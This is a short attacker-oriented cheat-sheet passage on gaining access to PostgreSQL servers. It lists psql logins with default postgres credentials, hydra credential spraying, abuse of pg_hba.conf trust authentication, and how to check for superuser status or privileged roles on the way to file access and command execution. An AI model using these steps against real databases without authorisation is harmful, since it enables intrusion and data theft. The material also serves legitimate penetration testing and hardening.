The target is any authenticated session, ideally as a superuser role. The default administrative role is postgres, and misconfigured pg_hba.conf entries frequently make access trivial.
Getting a session#
# Default/weak credentials for the postgres superuser
psql "host=<target> user=postgres password=postgres dbname=postgres"
# Spray credentials
hydra -L users.txt -P passwords.txt <target> postgres
Trust authentication#
pg_hba.conf can map a host or network to the trust method, which accepts any username with no password. Where the service is exposed and a trust line covers your source, you log in as any role, including postgres, for free:
psql "host=<target> user=postgres dbname=postgres" # no password prompt under trust
Exploitation notes#
- Check your role's privileges immediately:
SELECT current_user, usesuper FROM pg_user WHERE usename = current_user;. A superuser goes straight to command execution. - A non-superuser is still useful: certain roles (
pg_read_server_files,pg_execute_server_program) grant file and program access without full superuser, and several paths escalate an ordinary role to superuser. truston an internet-facing cluster is an unauthenticated superuser foothold, so always test it before spraying.
Tools#
- psql: the native client for interactive access and testing.
- hydra / metasploit
postgres_login: credential spraying.